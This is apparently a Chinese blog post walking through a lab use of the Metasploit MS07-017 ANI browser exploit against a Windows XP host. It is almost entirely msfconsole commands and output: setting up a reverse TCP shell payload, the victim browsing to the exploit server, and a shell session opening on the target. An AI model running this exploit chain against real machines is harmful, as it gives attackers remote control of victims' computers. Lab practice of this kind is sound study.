msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize 
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set SRVHOST 10.0.0.132
SRVHOST => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set lhost 10.0.0.132
lhost => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options

Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.0.0.132       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use.


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.132       yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista


msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.0.0.132:4444 
[*] Using URL: http://10.0.0.132:80/
[*] Server started.
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) >

2、在windows XP机器上访问

3、查看kali

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > [*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending HTML page
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.106
[*] Command shell session 1 opened (10.0.0.132:4444 -> 10.0.0.106:1069) at 2019-05-07 10:00:18 +0800

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x86/windows               10.0.0.132:4444 -> 10.0.0.106:1069 (10.0.0.106)

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [°汾 5.1.2600]
(C) °爨?? 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\??>ipconfig 
ipconfig 

Windows IP Configuration


Ethernet adapter ±??????

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 10.0.0.106
        Subnet Mask . . . . . . . . . . . : 255.0.0.0
        Default Gateway . . . . . . . . . : 10.0.0.254

Ethernet adapter Bluetooth θ?l??

        Media State . . . . . . . . . . . : Media disconnected

赞赏

长按二维码向我转账

受苹果公司新规定影响，微信 iOS 版的赞赏功能被关闭，可通过二维码转账支持公众号。